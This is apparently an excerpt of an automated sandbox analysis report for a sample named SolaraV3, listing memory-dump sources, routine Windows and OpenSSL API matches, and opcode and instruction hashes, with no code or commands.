                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastsocket
                                                                                                                                                                                                                              • String ID: ..\s\crypto\bio\b_sock2.c$2
                                                                                                                                                                                                                              • API String ID: 1120909799-2051290508
                                                                                                                                                                                                                              • Opcode ID: e6e0678db33773633ffedb91ac649e33e06e4e0a3b3b72e71866550694f6694c
                                                                                                                                                                                                                              • Instruction ID: beafdc6670f1654feba72e637a9a33e713b67fcd6e7ea84aabd733cf354cba77
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6e0678db33773633ffedb91ac649e33e06e4e0a3b3b72e71866550694f6694c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1301A1B1A0864283E3109B31E401EAD6328FB44754F648635E76E87AF5CF3DE9018B40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                              • Instruction ID: 3e07541550a7beac845259cbbb19ef6864434d5710c9611dbbcc26be15ba6914
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99D11772B18A8589EB11CFB9D4502AC3BB1FB54798B445236DE5ED7B89DE38D027C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DC71CF4B), ref: 00007FF6DC71D07C
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DC71CF4B), ref: 00007FF6DC71D107
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                              • Instruction ID: d4086e19ec2e577cb964cee3a3ddfca5792207dcce4a95709d42c44aaaa03619
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4691E532F1865A89F7619F6994602BD2BA0BB54BD8F14613BDE0E97684DF3CD463CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID: Operation not permitted$unknown
                                                                                                                                                                                                                              • API String ID: 1452528299-31098287
                                                                                                                                                                                                                              • Opcode ID: 4f38512cd59b4e9079a15f4968c6b5057c5ac8c27ef1edf97390e5a951f79121
                                                                                                                                                                                                                              • Instruction ID: c1190f1bdccbec8ad5bf378d072bfe5aab097b5d2d7ba7a0fc16d72e833bed9f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f38512cd59b4e9079a15f4968c6b5057c5ac8c27ef1edf97390e5a951f79121
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 348127E6A5974786EA10AB31E864BB963E4FF84B84F84C435DA4FC72B5DE3DE4408700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction ID: 0d8dca4ddf6bb01763834372b7d4b8cd04cdda96f7d9d93027bf4b6b5b985562
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E051F472F042198AEB24CF7C99756BC27A5AB44368F501236EE1E92AE5DF3CA5138700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction ID: 8ca903d05b4fe6d0601630d8177329e033a12db61ff2a03246d91cecf4230eba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A51AF22E086458AFB64CF75D4603BD37B1EB48B58F14A436DE0D97689DF38D4628700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction ID: 74362662c604f7e7c5f40a0a0847d562cf88e9f5bed9ed89757d8954ecb2912c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0111CC32F1C14A42F655976BE58427E52A1EF887C1F548032DF5987B9ACD3EE4E69300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                              • Instruction ID: ce08adde9aabb61b9443b9aac59d83fd0334e1be90b2680114abd763de43213f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40113C22B14F098AEB10CF70E8542BD33A4FB59758F440E36EA6D867A4DF7CD1668340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                              • Instruction ID: 50d53b75fb76f07c055c764a682fe6b2492e9f35f77b94a09d3338bf0f5a05a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED412B22A1828A46FBB18B25D52137DA755EB80BA8F144237EE5C87BD5DF3CD4A38700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
                                                                                                                                                                                                                              • API String ID: 3568877910-2648760357
                                                                                                                                                                                                                              • Opcode ID: 44843c6316de3de0d0998b74d2a3bbc3a6269f6be012f31292ad9ddc303ef141
                                                                                                                                                                                                                              • Instruction ID: c2b8eb4089a3e46bcfae6582dca435ac2cdc2cf4678a84cbe9cfc3508e73218e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44843c6316de3de0d0998b74d2a3bbc3a6269f6be012f31292ad9ddc303ef141
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D5122B2A197818AD764CF35E440E6AB7A4FB89750F449135EA8EC7B79DF3CE5408B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getaddrinfo
                                                                                                                                                                                                                              • String ID: ..\s\crypto\bio\b_addr.c
                                                                                                                                                                                                                              • API String ID: 300660673-2547254400
                                                                                                                                                                                                                              • Opcode ID: ff362b2e146a9955ea5a374bf5228206e2dd813b74c8d22398f2e98f30882444
                                                                                                                                                                                                                              • Instruction ID: 8cb05a3e228c13ad515d7a702ccb40f4cbc823b169dd04a935be67dff18d500f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff362b2e146a9955ea5a374bf5228206e2dd813b74c8d22398f2e98f30882444
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E4184B2A1878687E7509B76E441EB97750FB84740F508136EA8B87B75EF3CD4458B40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\extensions_clnt.c
                                                                                                                                                                                                                              • API String ID: 3568877910-592572767
                                                                                                                                                                                                                              • Opcode ID: 2277d602e12e024388a9d4cef9287e1d4121b4c948b8fb80c28345a1f791c9cc
                                                                                                                                                                                                                              • Instruction ID: 1123b02d9f1cdc2d4c37cba43d790b1486e8aaeccc5c0be061602811c09103ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2277d602e12e024388a9d4cef9287e1d4121b4c948b8fb80c28345a1f791c9cc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD41B1F2718B8186EB608B21E548AAD73A4FF84BC4F544032DB5C17B99DF3CE5A98704
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC719046
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC71A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC71A948: GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6DC70CBA5), ref: 00007FF6DC719064
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
